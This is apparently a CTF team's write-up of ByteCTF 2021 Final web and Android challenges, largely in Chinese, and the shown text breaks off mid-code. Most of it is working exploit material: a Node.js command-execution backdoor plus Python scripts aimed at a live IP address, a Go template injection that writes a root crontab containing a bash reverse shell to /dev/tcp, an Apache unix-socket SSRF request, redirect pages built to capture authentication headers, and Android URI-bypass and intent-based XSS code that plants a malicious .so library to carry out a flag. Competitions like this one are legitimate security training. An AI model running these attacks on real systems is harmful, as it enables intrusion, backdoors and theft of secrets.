ByteCTF 2021 Final By W&M
WEB
SEO
到处点首页有一堆api/xxx.php。这里能下载文件。抓到
api/word.php?src=6b77af.txt
读源码。/api/ip.php
<?php
// /api/ip.php as recovered through the download endpoint: takes a
// caller-supplied "domain", resolves it, fetches it with cURL and returns the
// IP, the page <title> and the base64-encoded response body as JSON.
// NOTE(review): this is a server-side request forgery (SSRF) primitive; the
// comments below mark each gap a fix would need to close.
error_reporting(0);
// Untrusted input: read straight from the POST body with no validation.
$domain = $_POST['domain'];
$ip = "1.1.1.1";
$site_title = "";
$content = "";
try {
// gethostbyname() does not throw; on failure it returns its argument
// unchanged, so the catch block below is never reached.
$ip = gethostbyname($domain);
} catch (Exception $e)
{
$ip = "域名解析异常";
}
// Denylist check: only a value containing "file:" is rejected. Other schemes
// the linked libcurl supports (gopher://, for one) and every internal or
// loopback address pass. An allowlist is the safer shape: accept http/https
// only, enforce it inside cURL with CURLOPT_PROTOCOLS and
// CURLOPT_REDIR_PROTOCOLS, and reject hosts that resolve to private ranges.
if(!preg_match("/file:/i", $domain)){
try {
$c = curl_init();
// The value is used as a complete URL, not just as a host name.
curl_setopt($c, CURLOPT_URL, $domain);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
// Redirects are followed, and the check above only saw the first URL, so a
// redirect target is never validated.
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
// curl_exec() reports failure by returning false rather than by throwing.
$data = curl_exec($c);
// The complete response body is handed back to the caller, which makes this
// a full-read SSRF rather than a blind one.
$content = base64_encode($data);
curl_close($c);
// Bodies that do not contain "utf-8" are treated as GBK and converted.
$pos = strpos($data,'utf-8');
if($pos===false){
$data = iconv("gbk","utf-8",$data);
}
// $title[1] is not set when no <title> element matched; error_reporting(0)
// hides the resulting warning.
preg_match("/<title>(.*)<\/title>/i",$data, $title);
$site_title = $title[1];
} catch (Exception $e)
{
$content = "error";
$site_title = "网站访问异常";
}
} else
{
$content = "error";
$site_title = "网站访问异常";
}
// Response fields: resolved address, extracted title, base64 body.
$ip_addr = array (
"ip" => $ip,
"title" => $site_title,
"res" => $content
);
header('Content-Type:text/json;charset=utf-8');
$ip_json = json_encode($ip_addr);
echo $ip_json;
再扫100的端口。得到3306.然后gopher写udf-命令执行
bytehouse
clickhouse。列数据库发现有information_Schema。可能连接mysql的
报错得到jdbc的链接字符串
jdbc mysql任意文件读。
读cmdline等文件
%java-XX:+UseContainerSupport-XX:+IdleTuningCompactOnIdle-XX:+IdleTuningGcOnIdle-Xdump:none-Xdump:tool:events=systhrow+throw,filter=*OutOfMemoryError,exec=kill -9 %pid-Dlog4j.configuration=file:////app/log4j.properties-Dnashorn.args=--language=es6-jarclickhouse-jdbc-bridge-shaded.jar
知道是用clickhouse-jdbc-bridge-shaded.jar起的
https://github.com/ClickHouse/clickhouse-jdbc-bridge/tree/master/misc/quick-start
docker下下来有个logs
用jdbc mysql读文件读logs的console.log
拿密码查下flag就行
nothing
1 ByteCTF[length]=4000绕过ByteCTF.length检测
2 ByteCTF[toString][]=使 字符串+ByteCTF+字符串 报错
3 由于exec没有降权,所以可以kill掉父进程 node。kill掉node,在node被脚本拉起之前,自己生一个生瓜蛋子占用:3000,启动自己的服务来回显(/tmp目录似乎不可写,用node -e直接传脚本执行)
(或者:用kill掉node 导致 http请求失败,来cut盲注flag,但是不稳定
[ `cut -b 1 /flagfilename` == x ] && pkill node)
//evil.js
// Minimal Express app with a single route that runs its query parameter as a
// shell command and returns the output. The write-up starts it in place of
// the challenge's own node server on port 3000.
// Detection notes: the observable trace is a node process launched with
// `node -e` instead of by the script that normally restarts the service, and
// listening on :3000.
const express = require('express')
// `fs` is required but not referenced anywhere in this listing.
const fs = require('fs')
const execSync = require('child_process').execSync;
const app = express()
app.get('/yyds', (req, res) => { // obscure path so that others cannot piggyback
// req.query.asdasdasdx reaches execSync() unchecked; the command output is
// returned behind the "SUCCESS:" marker.
res.send("SUCCESS:"+execSync(req.query.asdasdasdx).toString())
res.end()
})
app.listen(3000, () => {
console.log(`listening at port 3000`)
})
import requests
import base64
remote_url = "http://39.106.69.116:30001/?ByteCTF[length]=4000&ByteCTF[toString][]=&backdoor="
def encode(sth):
    """Percent-encode every character of ``sth``.

    Each character becomes ``%`` followed by its code point in lowercase hex,
    zero-padded to at least two digits. No character is left unescaped.
    """
    return "".join("%%%02x" % ord(ch) for ch in sth)
def execute_command(cmd):
    """Issue one GET to ``remote_url`` with ``cmd`` appended percent-encoded.

    The request goes through the local HTTP proxy on port 4476. Only the HTTP
    status code is returned; the response body is ignored.
    """
    response = requests.get(
        remote_url + encode(cmd),
        proxies={"http": "http://localhost:4476"},
    )
    return response.status_code
# Read evil.js and base64-encode it so the script text can travel inside a
# single command string.
evil_js_b64 = None
with open("evil.js","rb") as file:
evil_js_b64 = file.read()
evil_js_b64 = base64.b64encode(evil_js_b64).decode()
# Endless loop that re-sends the same command with no pause. For defenders the
# traffic is easy to spot in access logs: one client repeating the same request
# back to back, with a long `backdoor` value in which every character is
# percent-encoded.
while 1:
execute_command(f"pkill node;node -e \"`echo {evil_js_b64} | base64 -d`\"")
import requests
import base64
remote_url1 = "http://39.106.69.116:30001/yyds?asdasdasdx="
def encode(sth):
    """Return ``sth`` with each character written as ``%`` plus lowercase hex.

    The hex value is the character's code point, zero-padded to at least two
    digits; letters and digits are escaped like everything else.
    """
    pieces = []
    for ch in sth:
        pieces.append("%" + format(ord(ch), "02x"))
    return "".join(pieces)
def fetch_result(cmd):
    """GET ``remote_url1`` with ``cmd`` appended percent-encoded.

    The request goes through the local HTTP proxy on port 4476. Returns the
    response text when it contains the ``SUCCESS:`` marker, otherwise ``None``.
    """
    target = remote_url1 + encode(cmd)
    reply = requests.get(target, proxies={"http": "http://localhost:4476"})
    if "SUCCESS:" in reply.text:
        return reply.text
    return None
while 1:
#fetch_result("ls /")
a = fetch_result("cat /Th1s_1s_f1a9_31567878cd3283f5d02ccd5ea1d15aafadf1943ae39180ad96e74f3f0c1bbc3e")
if a:
print(a)
bytectf{50579195da002fa989432cbc1a83e38f5d3765122d9a7d4d767f99a61fa58f22}
Babyweb
golang ssti gin的框架
用户名ssti
能上传任意文件 写crontab 反弹shell
{{.SaveUploadedFile (.FormFile "glzjin1") "/var/spool/cron/crontabs/root"}}
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.F1jRTz/crontab installed on Sat Dec 11 12:53:26 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * bash -c 'bash -i >& /dev/tcp/xxx/9999 0>&1'
proxy
可以用apache2.4.48那个cve进行内网ssrf
GET /proxy?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://internal/fetch
通过这种方式可以SSRF到内网的python服务 然后发现python是requests发包 使用proxy进行代理认证
使用https 302 将请求头保存下来即可完成
1.php
<?php
file_put_contents("xxx.log",json_encode($_SERVGER));
header('location: https:/xxxxx/xxxx/2.php');?>
2.php
<?php
header('location: https://xxxx/xxxx/1.php')
用url参数请求1.php
拿到认证头解密即可
Mobile
HardDroid
1. 反射构造hierarchical Uri绕过
在程序中直接从 Intent 中取 Uri,并且对取出的内容检验了 Host 和 Scheme,但是在通过 loadUrl 的时候没有经过 Uri.parse,而是通过 toString 来放到了loadUrl中,造成可以通过反射构造 hierarchical Uri 绕过,在 https://www.anquanke.com/post/id/182420#h2-5 文章中有提到对应的利用思路。
其中也提到了,在高版本中,反射调用会在运行时报错失败。
由于这道题使用的是Android API 30,也就是 Android R,存在 Google 的这个限制,所以我们通过它给出绕过方法中的链接:https://github.com/tiann/FreeReflection,使用 FreeReflection 这个工具来进行攻击,其原理在 https://weishu.me/2018/06/07/free-reflection-above-android-p/ 中被详细解释,我们这边直接拿来用就好。
我将其封装为一个类来进行调用
/**
 * Builds an android.net.Uri through reflection instead of Uri.parse(): the
 * declared constructors of Uri$Part, Uri$PathPart and Uri$HierarchicalUri are
 * made accessible and called directly, so scheme, authority and path are
 * supplied as separate values.
 *
 * The result is built from scheme "http", authority "app.toutiao.com" and the
 * path "@" + attackerUri. Review note for defenders: a check that trusts
 * getScheme()/getHost() on a Uri object taken from an Intent, and then loads
 * uri.toString(), validates something other than what it loads. Re-parsing
 * with Uri.parse(uri.toString()) before validating makes the two agree.
 *
 * @param attackerUri text placed after "@" in the path component
 * @return the constructed Uri
 * @throws RuntimeException wrapping any exception raised while building it
 */
public Uri getUri(String attackerUri) {
String TAG = "WJH";
Uri uri;
try {
// NOTE(review): getDeclaredConstructors()[0] assumes the first declared
// constructor is the intended one - confirm for the platform version in use.
Class partClass = Class.forName("android.net.Uri$Part");
Constructor partConstructor = partClass.getDeclaredConstructors()[0];
partConstructor.setAccessible(true);
Class pathPartClass = Class.forName("android.net.Uri$PathPart");
Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
pathPartConstructor.setAccessible(true);
Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
hierarchicalUriConstructor.setAccessible(true);
// Both constructor arguments carry the same string for each part.
Object authority = partConstructor.newInstance("app.toutiao.com", "app.toutiao.com");
Object path = pathPartConstructor.newInstance("@" + attackerUri, "@" + attackerUri);
uri = (Uri) hierarchicalUriConstructor.newInstance("http", authority, path, null, null);
// Log what each accessor reports next to the full string form.
Log.d(TAG, "Scheme: " + uri.getScheme());
Log.d(TAG, "Authority: " + uri.getAuthority());
Log.d(TAG, "UserInfo: " + uri.getUserInfo());
Log.d(TAG, "Host: " + uri.getHost());
Log.d(TAG, "toString(): " + uri.toString());
} catch (Exception e) {
throw new RuntimeException(e);
}
return uri;
}
2.调用内部未 exported 类
根据初赛的题目我了解过这个思路,这里可以参考 http://blog.wjhwjhn.com/archives/613/ 这篇文章,这里简单的做一个说明。
在 MainActivity 中,程序对 shouldOverrideUrlLoading 进行了一个重写,并且在访问链接的 scheme 为 intent的情况下会进行一个拦截,同时先通过 parseUri 来解析传入参数,再使用 startActivity 对传入内容进行一个启动。这个来自内部的启动,使得我们可以调用内部的类。
这里在转换时需要选择 Intent.URI_INTENT_SCHEME 的这种形式,可以转换出可以被直接访问到的 Uri
Intent i2 = new Intent();
i2.setClassName("com.bytectf.harddroid", "com.bytectf.harddroid.TestActivity");
i2.setData(Uri.parse("http://app.toutiao.com"));
String uri_data = i2.toUri(Intent.URI_INTENT_SCHEME);
3.Universal-XSS
相关操作可以参考 https://twitter.com/_bagipro/status/1326511441306935296
在 TestActivity 类中,我们可以通过在启动时写一个 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志,使得第二次访问时,没有执行 onCreate 去 重新创建一个 WebView,而是通过 onNewIntent 来调用 loadUrl,在这种情况下,我们可以在第二次调用时来执行 javascript: xxx 这样的语句,从而实现在通过域名白名单的情形下来执行我们恶意的 JavaScript 代码。
4.恶意 JS 代码执行
通过分析题目中的 native 函数中的 native_write 函数,可以发现可以指定文件名来进行任意的写入,再结合代码中存在一个对 soPath 是否存在的判定,此判定允许二次载入 so 文件,不难想到我们可以通过 native_write 来在目录下写入一个 恶意的 so 文件,在此 so 文件的 JNI_Onload 函数中做一个实现,使得这个恶意的 so 文件可以在 JAVA 程序 load 之后将目录下的 flag 读出并访问我们指定的 web 链接从而带出 flag,可惜的是我之前都没接触过 native 文件的编写,于是拜托了战队中的 RE 神 —— 源神来搞定了这部分!源哥 yyds!
html 中的三次跳转代码解释
- 传入 url 参数跳转内容,实际上就是我们要跳转到的 http://app.toutiao.com 白名单网址
- 去通过 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志(launchFlags=0x20000000)去执行 JavaScript,从而调用到 jsi 中的写函数,把恶意的 so 文件写出到目录下。
- 等待写入后再去访问白名单网址,此时会检测到 soPath 的文件内容存在,同时使用了 System.load 去加载文件,加载中会自动去调用 so 文件中的 JNI_Onload,在其中把 flag 内容带出。
<html>
<body>
<script>
function GetQueryString(name)
{
var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if(r!=null)return unescape(r[2]); return null;
}
function doitjs()
{
location.href = decodeURIComponent(decodeURIComponent(GetQueryString('url')));
}
function doitjs2()
{
location.href = 'intent:jsi.write_file("/data/user/0/com.bytectf.harddroid/files/libUtils.so", "恶意so文件的base64代码")#Intent;scheme=javascript;launchFlags=0x20000000;component=com.bytectf.harddroid/.TestActivity;end';
}
setTimeout(doitjs, 0);
setTimeout(doitjs2, 3000);
setTimeout(doitjs, 15000);
</script>
</body>
</html>
ByteDraid1
1 用..%2F..逃逸路径
2 任意域名均可http://domain/local_cache/ 逃逸到自己的.html文件,因此可以跳转,访问tiktok.com的cookie
3 chmod 777 自己的文件(需要自己的TargetSDKVersion低)
//MainActivity
//TargetSDKVersion越低越好,高了不能chmod 自己的data文件夹
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setup_our_file();
if(true) {
Intent target = new Intent();
target = getPackageManager().getLaunchIntentForPackage("com.bytectf.bytedroid1");
target.setData(Uri.parse("http://bytectf.toutiao.com/local_cache/..%2F../com.bytectf.pwnbytedroid1/files/1.html"));
startActivity(target);
}
}
private void setup_our_file() {
try {
Runtime.getRuntime().exec(new String[]{"/system/bin/sh","-c",
"mkdir /data/data/com.bytectf.pwnbytedroid1/files;"+
